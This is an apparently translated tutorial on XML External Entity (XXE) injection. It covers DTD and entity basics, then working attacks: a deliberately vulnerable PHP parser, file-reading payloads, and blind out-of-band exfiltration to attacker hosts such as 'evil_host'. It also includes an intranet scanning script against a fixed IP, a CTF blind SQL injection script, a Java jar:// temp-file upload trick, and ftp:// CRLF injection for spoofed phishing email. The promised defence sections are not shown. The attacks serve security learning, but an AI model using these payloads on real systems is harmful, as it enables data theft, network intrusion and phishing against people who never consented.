An in-depth guide to understanding the XXE vulnerability

Table of contents

  1. What is XXE
  2. Background knowledge
  3. Basic knowledge
    1. Here comes the point:
  4. What can we do
    1. Experiment 1: Read local sensitive files with echo (Normal XXE)
    2. New problems arise
    3. New solution
    4. Experiment 2: Read local sensitive files without echo (Blind OOB XXE)
    5. New thinking:
    6. New exploits:
    7. Experiment 3: HTTP intranet host detection
    8. Experiment 4: HTTP intranet host port scanning
    9. Experiment 5: Intranet Blind Injection (CTF)
    10. Experiment 6: File upload
    11. Experiment 7: Phishing:
    12. Experiment 8: Others:
  5. Where does the real XXE appear?
    1. Example 1: Simulation situation
    2. Example 2: XXE of WeChat Pay
    3. Example 3: JSON content-type XXE
  6. How XXE defends
    1. Option 1: Use the language-recommended method of disabling external entities
    2. Solution 2: Manual blacklist filtering (not recommended)
  7. Summary

1. What is XXE

Before introducing XXE, let me first mention ordinary XML injection. Its uses are relatively narrow, and where it does exist it is usually a logic flaw.

[Figure: an example of ordinary XML injection]

Since we can insert XML code, we should not stop there. We want more, and that is where XXE comes in.

XXE stands for XML External Entity injection. As the name says, this is an injection vulnerability. What gets injected? An XML external entity. (Some readers will say I am stating the obvious.) What I really want to emphasize is that the point of exploitation is the external entity: keep your eyes on external entities and do not let other XML concepts with similar names distract you. If an external entity can be injected and successfully parsed, the attack surface of XML injection widens considerably. This may be why XXE is discussed on its own while ordinary XML injection is rarely mentioned: ordinary XML injection is of little practical use and is hardly seen in real attacks.

2. Background knowledge

XML is a very popular markup language. It was first standardized in the late 1990s and has been adopted by countless software projects. It is used for configuration files, document formats (such as OOXML, ODF, PDF, RSS, ...), image formats (SVG, EXIF headers) and network protocols (WebDAV, CalDAV, XMLRPC, SOAP, XMPP, SAML, XACML, ...). It is so pervasive that any problem with it can have disastrous consequences.

In the process of parsing external entities, XML parsers can query various network protocols and services (DNS, FTP, HTTP, SMB, etc.) according to the scheme (protocol) specified in the URL. External entities are useful for creating dynamic references in documents so that any changes made to the referenced resource are automatically updated in the document. However, many attacks can be launched against the application when dealing with external entities. These attacks include exfiltrating local system files, which may contain sensitive data such as passwords and private user data, or exploiting the network access capabilities of various schemes to manipulate internal applications. By combining these attacks with other implementation flaws, the scope of these attacks can be extended to client-side memory corruption, arbitrary code execution, and even service disruption, depending on the context of these attacks.

3. Basic knowledge

XML documents follow a format specification, which is defined by a DTD (document type definition). A DTD looks like this:

Sample code:

<?xml version="1.0"?> <!-- this line is the XML declaration -->
<!DOCTYPE message [
<!ELEMENT message (receiver ,sender ,header ,msg)>
<!ELEMENT receiver (#PCDATA)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT header (#PCDATA)>
<!ELEMENT msg (#PCDATA)>
]>

The DTD above defines message as the root element of the XML document and declares its child elements, so the XML must be written as follows:

Sample code:

<message>
<receiver>Myself</receiver>
<sender>Someone</sender>
<header>TheReminder</header>
<msg>This is an amazing book</msg>
</message>

Besides defining elements in a DTD (which correspond to the tags in XML), we can also define entities in a DTD (which correspond to the content inside XML tags). After all, apart from the tags, an XML document also has content that needs to be defined in advance.

Sample code:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>

Here the element is declared as ANY, which means it accepts any content, and an XML entity is defined. This is the first time an entity appears in this article. An entity can be regarded as a variable that we reference in the XML with the & symbol, so the XML can be written as:

Sample code:

<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

We use &xxe; to reference the xxe entity defined above, and &xxe; is replaced by "test" in the output.
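The substitution can be observed with any XML parser that expands internal entities. The following is a minimal sketch using Python's standard xml.etree.ElementTree; it only covers the internal entity from the example above, and the choice of parser is an assumption made for illustration, not the setup used in this article.

```python
import xml.etree.ElementTree as ET

# DTD with one internal entity, followed by a document that references it.
document = """<?xml version="1.0"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe "test" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>"""

root = ET.fromstring(document)

# The parser has already replaced &xxe; with the entity's value.
user = root.find("user").text
print(user)
```

The application never sees the reference itself, only the expanded value, which is exactly why entity content ends up in responses.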

Here comes the point:

Key point one:

Entities are divided into two types: internal entities and external entities. The example above is an internal entity, but an entity can also be loaded from an external DTD file. Look at the following code:

Sample code:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

This way, any change made to the referenced resource is automatically reflected in the document, which is very convenient (and convenience is always the enemy of security).

There is also another way to reference an external resource: referencing a public DTD. The syntax is as follows:

<!DOCTYPE root-element-name PUBLIC "DTD-identifier" "URI-of-the-public-DTD">

In our attack this can play the same role as SYSTEM.

Key point two:

Above we divided entities into two groups (internal entities and external entities). From another perspective, entities can also be divided into two other groups (general entities and parameter entities). Do not confuse the two classifications.

1. General entity

A general entity is defined in the DTD and referenced in the XML document as &entityname;

Sample code:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE updateProfile [<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> 
<updateProfile>  
    <firstname>Joe</firstname>  
    <lastname>&file;</lastname>  
    ... 
</updateProfile>

2. Parameter entity:

(1) Declared in the DTD as % entity-name (the space after the % is required), and referenced only inside the DTD as %entity-name;
(2) Only in a DTD file can the declaration of a parameter entity reference other entities
(3) Like general entities, parameter entities can also reference external resources

Sample code:

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> 
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> 
%an-element; %remote-dtd;

Note:

Parameter entities play a vital role in our Blind XXE

4. What can we do

The previous section kept hinting at external entities, so what exactly can they do?

When you see the following code, any reader with a little security awareness should start to sense something:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

Since we can read a DTD this way, can we change the path to that of a sensitive file and read the sensitive file instead?

Experiment 1: Read local sensitive files with echo (Normal XXE)

This experiment simulates a service that accepts and parses XML input and echoes the result. We submit our own XML and use an external entity to reference a file on the server.

Place the following XML-parsing PHP code on the local server:

Sample code:

xml.php

<?php

    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;

?>

payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]> 
<creds>&goodies;</creds>

[Figure: the response contains the contents of system.ini]

That file contains no special characters, so reading it goes smoothly. What happens if we switch to a file like the following?

[Figure: a file that contains special characters]

Let's try it:

[Figure: the parser reports errors instead of returning the file]

Not only did we fail to read the file we wanted, the parser also threw a series of errors. What can we do? This is where another tool comes in: CDATA. Here is a brief introduction (quoted from my blog post on XML):

Some content should not be parsed by the parsing engine but treated as raw content. CDATA makes the parser treat a whole block of data as plain character data instead of markup. When content contains many <, >, & or " characters, placing it in a CDATA section means every character is treated as part of the element's character data, not as XML tags.

<![CDATA[


XXXXXXXXXXXXXXXXX

]]>

Any characters may appear inside except ]]>, and CDATA sections cannot be nested.

This is useful whenever a tag may contain special or unpredictable characters: we can wrap the content in CDATA.
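The effect of CDATA is easy to check outside the attack scenario. The sketch below, again using Python's standard xml.etree.ElementTree as an assumed stand-in parser, feeds the same text to the parser twice: once raw and once wrapped in a CDATA section. The sample text is made up for the illustration.

```python
import xml.etree.ElementTree as ET

# Text with characters that are markup-significant in XML.
raw = "<msg>if (a < b && c > d) { run(); }</msg>"
try:
    ET.fromstring(raw)
    parsed_raw = True
except ET.ParseError:
    # The bare < and & make the document not well-formed.
    parsed_raw = False

# The same text inside CDATA is taken as plain character data.
wrapped = "<msg><![CDATA[if (a < b && c > d) { run(); }]]></msg>"
text = ET.fromstring(wrapped).text

print(parsed_raw)
print(text)
```

The raw version is rejected, while the wrapped version comes back unchanged, which is the behaviour the following payload tries to obtain for file contents.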

So we can get around the problem by wrapping the data we read in CDATA before it is output. How do we do that? Let's analyze it briefly.

First, find where the problem occurs. It occurs here:

...
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]>
<creds>&goodies;</creds>

The content pulled in by the reference contains characters that break the XML format (characters such as &, <, >, ", ' must be escaped inside entity content, otherwise the XML parser reports errors). We want to put "<![CDATA[" and "]]>" on either side of the reference, but XML has no syntax for concatenating strings, so I wondered whether referencing several entities one after another would work.

[Figure: the parser reports an error when the three entities are referenced in sequence]

Note that all three entities are plain strings, and referencing them back to back produces an error. This means we cannot do the concatenation in the XML body: the pieces have to be joined first and then referenced from the XML. To concatenate inside the DTD, we have only one option, which is to use parameter entities.

payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">   
<!ENTITY % goodies SYSTEM "file:///d:/test.txt">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd"> 
%dtd; ]> 

<roottag>&all;</roottag>

evil.dtd

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

[Figure: the file is read successfully]

Interested readers can trace the whole call sequence themselves. I analyze a similar example later on, so I will skip it here to save space.

Note:

In Java there is another protocol that can be used in place of file: netdoc. I will demonstrate it later when analyzing WeChat's XXE.

New problems arise

Think about it, though: XML on the server is usually not parsed in order to be echoed back. It is typically used for configuration, or, in some extreme cases, a class that parses XML gets instantiated through another vulnerability. To exploit this vulnerability in realistic conditions, we need a method that does not depend on an echo: out-of-band exfiltration.

New solution

To exfiltrate data we must be able to make the server send a request. Where can a request be triggered? Clearly, wherever an external entity is defined. But triggering a request is not enough. The request has to carry our data out, and that data is itself obtained through an external request. In other words, we need one request to embed the result of another request. After some analysis, only parameter entities can do this (and according to the specification, this "embed the result of one request in another" step must be done in a DTD file).

Experiment 2: Read local sensitive files without echo (Blind OOB XXE)

xml.php

<?php

libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
?>

test.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip:9999?p=%file;'>">

2019.5.8 update

Because of a rendering problem, the character reference &#37; in front of send was at one point displayed as a literal %. The % there must be written as &#37; (the reason is explained below), so check this when copying and pasting the code.

payload:

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>

[Figure: the attacker's server receives a request carrying base64 data]

We can clearly see that our server received the base64-encoded content of the sensitive file. The encoding keeps the file content from breaking the XML syntax. Without it, an error is reported.

The whole calling process:

The payload references three parameter entities in a row: %remote;%int;%send;. This is the order of exploitation. %remote is referenced first and fetches test.dtd from the remote server, much like including test.dtd. Then %int is expanded, which in turn expands %file from test.dtd. %file reads the sensitive file on the server, and its result is filled into the declaration of %send (a literal % is not allowed in the entity value there, so it is written as the character reference &#37;). Finally we reference %send;, which sends the data we read to our remote VPS. The data is thereby carried out of band, which neatly solves the problem of XXE having no echo.
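On the receiving side, the request line logged by the VPS still has to be turned back into the file content. A minimal sketch of that step follows; it assumes the parameter is named p as in test.dtd above, and the function name decode_exfil and the sample request path are hypothetical.

```python
import base64
from urllib.parse import urlsplit


def decode_exfil(request_path, param="p"):
    """Return the decoded bytes carried in ?p=<base64> of a logged request path."""
    query = urlsplit(request_path).query
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == param:
            # Restore padding in case the log or the server trimmed it.
            value += "=" * (-len(value) % 4)
            return base64.b64decode(value)
    raise KeyError(param)


# Simulated request path as it would appear in the listener's access log.
sample_path = "/?p=" + base64.b64encode(b"secret data").decode("ascii")
recovered = decode_exfil(sample_path)
print(recovered)
```

The query string is split by hand rather than with a form decoder, because a form decoder would turn any + in the base64 data into a space.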

New thinking:

What we just did was read local files through the file protocol and send requests through the http protocol. Readers familiar with SSRF will react quickly: this is very similar to SSRF, because in both cases the server is made to send a request to another server. If we change the remote address to an intranet address (such as 192.168.0.10:8080), can we achieve the same effect as SSRF? Yes. XXE is in fact one way of carrying out SSRF, because SSRF is just an attack pattern, and many protocols and vulnerabilities can be used to carry it out.

New exploits:

So to go further, we cannot limit our view to the file protocol. We need to know exactly which protocols are available on which platform.

[Figure: protocols supported on each platform]

Protocols that PHP supports after installing extensions:

[Figure: additional PHP protocols available through extensions]

Note:

1. Support for the gopher scheme was removed from Oracle JDK starting in September 2012; the versions that still support it are Oracle JDK 1.7 update 7 and Oracle JDK 1.6 update 35
2. libxml is PHP's XML support

Experiment 3: HTTP intranet host detection

We use the XXE-vulnerable server as a pivot to probe the intranet. Some preparation is needed first: use the file protocol to read the pivot server's network configuration to see whether it has an intranet and what the network segment looks like (I use Linux as an example). We can try reading /etc/network/interfaces, /proc/net/arp or /etc/hosts, which gives us a general direction for probing.

The following is an example probe script:

import requests
import base64

# Original XML that the server accepts
# <xml>
#     <stuff>user</stuff>
# </xml>


def build_xml(string):
    # Wrap the given URI in an external entity and send the document
    xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""
    xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""
    xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""
    xml = xml + "\r\n" + """<xml>"""
    xml = xml + "\r\n" + """    <stuff>&xxe;</stuff>"""
    xml = xml + "\r\n" + """</xml>"""
    send_xml(xml)


def send_xml(xml):
    headers = {'Content-Type': 'application/xml'}
    x = requests.post('http://34.200.157.128/CUSTOM/NEW_XEE.php', data=xml, headers=headers, timeout=5).text
    coded_string = x.split(' ')[-2]  # a little split to get only the base64 encoded value
    print(coded_string)
    # print(base64.b64decode(coded_string))


# Probe every host in 10.0.0.1 - 10.0.0.254 over HTTP
for i in range(1, 255):
    try:
        ip = '10.0.0.' + str(i)
        string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'
        print(string)
        build_xml(string)
    except Exception:
        # Timeouts and unexpected responses mean the host did not answer
        continue

[Figure: result returned by the probe script]

Experiment 4: HTTP intranet host port scanning

Once we find a host on the intranet and want to know where it can be attacked, we still need to scan its ports. The port-scanning script is almost identical to the host-detection script: fix the IP address and loop over the ports. Whether a port is open is judged by the response time, and readers can adapt the script themselves. Besides this method, we can also use Burp Suite for port detection.
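The adaptation described above might look like the following sketch. It uses only the Python standard library; TARGET_URL, INTERNAL_HOST, the XML element names and the port list are all hypothetical placeholders, and how to interpret the timing or error text depends on the target, so treat this as a starting point rather than a finished scanner.

```python
import time
import urllib.error
import urllib.request

TARGET_URL = "http://vulnerable.example/xml.php"  # hypothetical XXE endpoint
INTERNAL_HOST = "192.168.0.10"                    # hypothetical intranet host


def build_probe(host, port):
    """Return an XML document whose external entity points at host:port."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "http://{host}:{port}/">\n'
        "]>\n"
        "<xml><stuff>&xxe;</stuff></xml>"
    )


def probe(host, port, timeout=5.0):
    """POST one probe and return (elapsed_seconds, response_or_error_text)."""
    request = urllib.request.Request(
        TARGET_URL,
        data=build_probe(host, port).encode("utf-8"),
        headers={"Content-Type": "application/xml"},
    )
    started = time.monotonic()
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            body = response.read().decode("utf-8", errors="replace")
    except (urllib.error.URLError, OSError) as exc:
        body = str(exc)
    return time.monotonic() - started, body


def scan(host, ports):
    """Probe each port in turn and collect the timing and response per port."""
    return {port: probe(host, port) for port in ports}
```

Calling scan(INTERNAL_HOST, [22, 80, 6379, 8080]) returns one (elapsed, text) pair per port. Ports whose timing or error text differs from the rest are the ones worth a closer look.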

For example, we pass in:

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE data SYSTEM "http://127.0.0.1:515/" [  
<!ELEMENT data (#PCDATA)>  
]>
<data>4</data>

Returned result:

javax.xml.bind.UnmarshalException  
 - with linked exception:
[Exception [EclipseLink-25004] (Eclipse Persistence Services): org.eclipse.persistence.exceptions.XMLMarshalException
Exception Description: An error occurred unmarshalling the document  
Internal Exception: ████████████████████████: Connection refused

This completes one port probe. To probe more, we can make the requested port a parameter and let Burp Suite's Intruder do the work for us.

[Figure: Burp Suite Intruder port-probing results]

At this point we can survey the whole network segment and gather information about the intranet servers. If an intranet server has a vulnerability whose exploit fits within the protocols supported by the vulnerable server, we can use XXE to attack it directly and even get a shell (for example, an unauthenticated Redis instance on the intranet, or services that give a shell through a plain HTTP GET request, such as Struts2).

Experiment 5: Intranet Blind Injection (CTF)

One challenge in the 2018 Qiangwang Cup used an XXE vulnerability to perform blind SQL injection against the intranet. The general idea is as follows.

First, we found an XXE vulnerability in the comment box of the external host at 39.107.33.75:33899. When we submit XML with a DTD, an error appears.

[Figure: the error returned after submitting XML and a DTD]

In that case, can we read files on the server? Let's read the configuration file first (this is Blind XXE, so it requires parameter entities and an external DTD):

/var/www/52dandan.cc/public_html/config.php

This gives us the first part of the flag:

<?php
define(BASEDIR, "/var/www/52dandan.club/");
define(FLAG_SIG, 1);
define(SECRETFILE,'/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431');
....
?>

Note:

Here is a little trick. When libxml reads a file, the content cannot be too large or an error is reported, so we use one of the php filter compression methods to compress it.

Compression: echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd");
Decompression: echo file_get_contents("php://filter/read=convert.base64-decode/zlib.inflate/resource=/tmp/1");
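The decompression step can also be done on the attacker's machine without PHP. The sketch below assumes that the zlib.deflate filter emits a raw deflate stream (the PHP manual describes it in terms of RFC 1951), which is why a negative window size is passed to Python's zlib; if decoding fails against real output, that assumption is the first thing to check. The helper names are hypothetical.

```python
import base64
import zlib


def decode_deflated(encoded):
    """Undo convert.base64-encode followed by a raw deflate stream."""
    compressed = base64.b64decode(encoded)
    return zlib.decompress(compressed, -15)  # -15 selects raw deflate, no header


def encode_deflated(data):
    """Produce the same shape of data locally, to exercise the decoder."""
    compressor = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = compressor.compress(data) + compressor.flush()
    return base64.b64encode(raw).decode("ascii")


sample = b"root:x:0:0:root:/root:/bin/bash\n" * 20
encoded = encode_deflated(sample)
print(len(sample), len(encoded))
restored = decode_deflated(encoded)
```

Repetitive files such as /etc/passwd shrink considerably, which is what keeps the exfiltrated value within the parser's size limit.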

Next we look for other machines on the intranet by reading

/proc/net/arp
/etc/hosts

and find the IP address of another intranet server: 192.168.223.18
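Once the content of /proc/net/arp has been exfiltrated, the neighbouring hosts can be pulled out of it mechanically. The following sketch assumes the usual six-column Linux layout of that file. The sample table is fabricated for the illustration (only the IP address 192.168.223.18 comes from this write-up), and treating flags 0x0 as an incomplete entry is likewise an assumption.

```python
def parse_arp_table(text):
    """Return (ip, mac, device) tuples for resolved entries of /proc/net/arp."""
    hosts = []
    for line in text.splitlines()[1:]:  # the first line is the column header
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hw_type, flags, mac, _mask, device = fields[:6]
        if flags == "0x0":  # assumed to mark an unresolved entry
            continue
        hosts.append((ip, mac, device))
    return hosts


# Fabricated sample in the /proc/net/arp layout.
sample = """IP address       HW type     Flags       HW address            Mask     Device
192.168.223.18   0x1         0x2         02:42:c0:a8:df:12     *        eth0
192.168.223.1    0x1         0x0         00:00:00:00:00:00     *        eth0
"""

hosts = parse_arp_table(sample)
print(hosts)
```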

With this IP we used XXE to scan its ports and found port 80 open. We then scanned its directories and found test.php. According to the hint, the shop parameter of this page is injectable. But because this is Blind XXE, the request to the intranet server is defined in our remote DTD, so every time we change the request we have to modify the DTD file on our remote server. The script therefore runs on our VPS, rewriting the DTD and sending a request to the XXE-vulnerable host in each iteration. It looks like this:

Sample code:

import requests

url = 'http://39.107.33.75:33899/common.php'
s = requests.Session()
result = ''
data = {
    "name": "evil_man",
    "email": "[email protected]",
    "comment": """<?xml version="1.0" encoding="utf-8"?>
                <!DOCTYPE root [
                <!ENTITY % dtd SYSTEM "http://evil_host/evil.dtd">
                %dtd;]>
                """
}

# Template of the remote DTD; {} is filled with the LIKE pattern for each guess.
# Inside the entity value, the % in front of send is written as &#37;.
dtd_template = """<!ENTITY % file SYSTEM "php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3'-(case%a0when((select%a0group_concat(total)%a0from%a0albert_shop)like%a0binary('{}'))then(0)else(1)end)-'1">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://evil_host/?result=%file;'>">
%all;
%send;"""

for i in range(0, 28):          # position inside the 28-character value
    for j in range(48, 123):    # candidate characters from '0' to 'z'
        payload2 = dtd_template.format('_' * i + chr(j) + '_' * (27 - i))
        # Rewrite the DTD that our VPS serves before each request
        with open('./evil.dtd', 'w') as f:
            f.write(payload2)
        print('test {}'.format(chr(j)))
        r = s.post(url, data=data)
        # Marker string that the script looks for in the response
        if "Oti3a3LeLPdkPkqKF84xs=" in r.text and chr(j) != '_':
            result += chr(j)
            print(chr(j))
            break
print(result)

This challenge is very difficult and extremely time-consuming, since everything has to be guessed by the script, so it had 0 solves at the time.

Experiment 6: File upload

Everything so far seems tied to PHP, but in reality many XXE vulnerabilities occur in Java frameworks. Reading the documentation, I found that Java has a rather magical protocol, jar://, and PHP's phar:// seems to have been designed to provide similar functionality.

The format of the jar:// protocol:

jar:{url}!{path}

Example:

jar:http://host/application.jar!/file/within/the/zip

The part after the ! is the file to be extracted from the archive.

jar:// can fetch a jar file remotely and then extract its contents, which makes it more powerful than phar://, because phar:// cannot load remote files. (That is why phar:// is generally used to bypass file-upload restrictions. This technique appeared in some HCTF challenges in 2016, and I have set similar challenges in school competitions. The phar:// deserialization presented at Black Hat 2018 is also very interesting, and Orange had already used it in a HITCON challenge in 2017.)

The process of jar protocol processing files:

(1) Download the jar/zip file to a temporary file
(2) Extract the file we specified
(3) Delete the temporary file
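To make the three steps concrete, here is a small local simulation in Python. It does not call Java or the jar: handler at all. It only mimics the download, extract, delete sequence with a temporary file and the standard zipfile module, and the function name fetch_entry and the sample archive are made up for the illustration.

```python
import io
import os
import tempfile
import zipfile


def fetch_entry(archive_bytes, entry_name):
    """Mimic the three steps: save to a temp file, extract one entry, delete."""
    fd, temp_path = tempfile.mkstemp(suffix=".tmp")
    try:
        with os.fdopen(fd, "wb") as temp_file:
            temp_file.write(archive_bytes)        # (1) "download" to a temp file
        with zipfile.ZipFile(temp_path) as archive:
            content = archive.read(entry_name)    # (2) extract the requested entry
    finally:
        os.remove(temp_path)                      # (3) delete the temp file
    return temp_path, content


# Build a tiny archive in memory to stand in for the remote jar/zip.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("file/within/the/zip", "hello from the archive")

temp_path, content = fetch_entry(buffer.getvalue(), "file/within/the/zip")
print(content, os.path.exists(temp_path))
```

The archive exists on disk only between steps (1) and (3), so anything that wants to use that file has to act inside this window.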

So how do we find the temporary files we downloaded?

Because the file:/// protocol can play the role of listing directories in java, we can use the file:/// protocol with the jar:// protocol

Here is part of my testing process.

First I simulate an XXE-vulnerable program locally, using Java source code I found online that parses an XML file directly.

Sample code:

xml_test.java

package xml_test;
import java.io.File;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Attr;
import org.w3c.dom.Comment;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

/**
 * Recursively parses any given XML document and prints its content to the command line
 * @author zhanglong
 *
 */
public class xml_test
{
    public static void main(String[] args) throws Exception
    {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder db = dbf.newDocumentBuilder();

        Document doc = db.parse(new File("student.xml"));
        // get the root element node
        Element root = doc.getDocumentElement();

        parseElement(root);
    }

    private static void parseElement(Element element)
    {
        String tagName = element.getNodeName();

        NodeList children = element.getChildNodes();

        System.out.print("<" + tagName);

        // NamedNodeMap holding all attributes of the element; it must be checked for null
        NamedNodeMap map = element.getAttributes();

        // if the element has attributes
        if(null != map)
        {
            for(int i = 0; i < map.getLength(); i++)
            {
                // get each attribute of the element
                Attr attr = (Attr)map.item(i);

                String attrName = attr.getName();
                String attrValue = attr.getValue();

                System.out.print(" " + attrName + "=\"" + attrValue + "\"");
            }
        }

        System.out.print(">");

        for(int i = 0; i < children.getLength(); i++)
        {
            Node node = children.item(i);
            // get the node type
            short nodeType = node.getNodeType();

            if(nodeType == Node.ELEMENT_NODE)
            {
                // it is an element, so keep recursing
                parseElement((Element)node);
            }
            else if(nodeType == Node.TEXT_NODE)
            {
                // recursion exit
                System.out.print(node.getNodeValue());
            }
            else if(nodeType == Node.COMMENT_NODE)
            {
                System.out.print("<!--");

                Comment comment = (Comment)node;

                // comment content
                String data = comment.getData();

                System.out.print(data);

                System.out.print("-->");
            }
        }

        System.out.print("</" + tagName + ">");
    }
}

With this source code, we need to create an xml file locally, I named it student.xml

student.xml

<!DOCTYPE convert [ 
<!ENTITY  remote SYSTEM "jar:http://localhost:9999/jar.zip!/wm.php">
]>
<convert>&remote;</convert>

[Figure: directory structure of the test project]

Clearly, the request goes to port 9999 on my local machine. What is listening on port 9999? A TCP server I wrote in Python.

Sample code:

server.py

import sys 
import time 
import threading 
import socketserver 
from urllib.parse import quote 
import http.client as httpc 

listen_host = 'localhost' 
listen_port = 9999 
jar_file = sys.argv[1]

class JarRequestHandler(socketserver.BaseRequestHandler):  
    def handle(self):
        http_req = b''
        print('New connection:',self.client_address)
        while b'\r\n\r\n' not in http_req:
            try:
                http_req += self.request.recv(4096)
                print('Client req:\r\n',http_req.decode())
                jf = open(jar_file, 'rb')
                contents = jf.read()
                headers = ('''HTTP/1.0 200 OK\r\n'''
                '''Content-Type: application/java-archive\r\n\r\n''')
                self.request.sendall(headers.encode('ascii'))

                self.request.sendall(contents[:-1])
                time.sleep(30)
                print(30)
                self.request.sendall(contents[-1:])

            except Exception as e:
                print ("get error at:"+str(e))


if __name__ == '__main__':

    jarserver = socketserver.TCPServer((listen_host,listen_port), JarRequestHandler) 
    print ('waiting for connection...') 
    server_thread = threading.Thread(target=jarserver.serve_forever) 
    server_thread.daemon = True 
    server_thread.start() 
    server_thread.join()

This server accepts the client's request and sends back the file named by the argument we pass at startup. There is one more detail: I added a sleep(30). I will explain why shortly.

Since our goal is file upload, let's go back to how the jar protocol handles a file.

The process of jar protocol processing files:

(1) Download the jar/zip file to a temporary file
(2) Extract the file we specified
(3) Delete the temporary file

So how do we find this temporary file? It has to be leaked through an error message. Suppose we request

jar:http://localhost:9999/jar.zip!/1.php

If jar.zip does not contain 1.php, the Java parser reports an error saying that the file cannot be found in the temporary file, and the error includes the temporary file's path.

[Figure: the error message reveals the temporary file path]

Now that we have the temporary file's path, we need a way to use the file, that is, a way to keep it on the system longer. The approach I came up with is sleep(). This raises another problem: the window in which we can use the file is while the transfer is still incomplete. To make sure the useful content is complete at that point, I use a hex editor to append junk bytes to the end of the file before transferring it, which solves the problem neatly.

[Screen recording of the experiment omitted]

That is the end of the experiment. How to use it is up to you (wicked grin).

I set a CTF challenge based on this in LCTF 2018. For the detailed write-up, see my article on it.

Experiment 7: Phishing:

If there is a vulnerable SMTP server on the intranet, we can use the ftp:// protocol combined with CRLF injection to send it arbitrary commands. In other words, we can make it send any email to anyone, forging the sender and enabling phishing (the following example comes from an article on fb).

Java supports ftp URIs in sun.net.ftp.impl.FtpClient. Therefore, we can specify a username and password, such as ftp://user:password@host:port/test.txt, and the FTP client will send the corresponding USER command in the connection.

But if we add %0D%0A (CRLF) anywhere in the user part of the URL, we can terminate the USER command and inject a new command into the FTP session, allowing us to send arbitrary SMTP commands to port 25:

Sample code:

ftp://a%0D%0A
EHLO%20a%0D%0A
MAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0A
RCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0A
DATA%0D%0A
From%3A%20support%40VULNERABLESYSTEM.com%0A
To%3A%20victim%40gmail.com%0A
Subject%3A%20test%0A
%0A
test!%0A
%0D%0A
.%0D%0A
QUIT%0D%0A
:[email protected]:25
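A URL of this shape can be assembled programmatically instead of being encoded by hand. The sketch below percent-encodes a list of SMTP commands into the user part of an ftp:// URL with urllib.parse.quote. The function name, the host mail.internal.example and the default user and password values are hypothetical, and every line is terminated with CRLF for simplicity.

```python
from urllib.parse import quote, unquote


def build_ftp_smtp_url(host, commands, user="a", password="a", port=25):
    """Embed CRLF-separated SMTP commands in the user part of an ftp:// URL."""
    injected = "\r\n".join(commands) + "\r\n"
    # safe="" forces every reserved character, including CR and LF, to be encoded.
    userinfo = quote(user + "\r\n" + injected, safe="")
    return f"ftp://{userinfo}:{quote(password, safe='')}@{host}:{port}"


commands = [
    "EHLO a",
    "MAIL FROM:<support@VULNERABLESYSTEM.com>",
    "RCPT TO:<victim@gmail.com>",
    "DATA",
    "Subject: test",
    "",
    "test!",
    ".",
    "QUIT",
]
url = build_ftp_smtp_url("mail.internal.example", commands)
print(url)
```

Decoding the user part with unquote gives back the exact byte sequence the FTP client would write to the socket, which is a quick way to review the injected session before using it.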

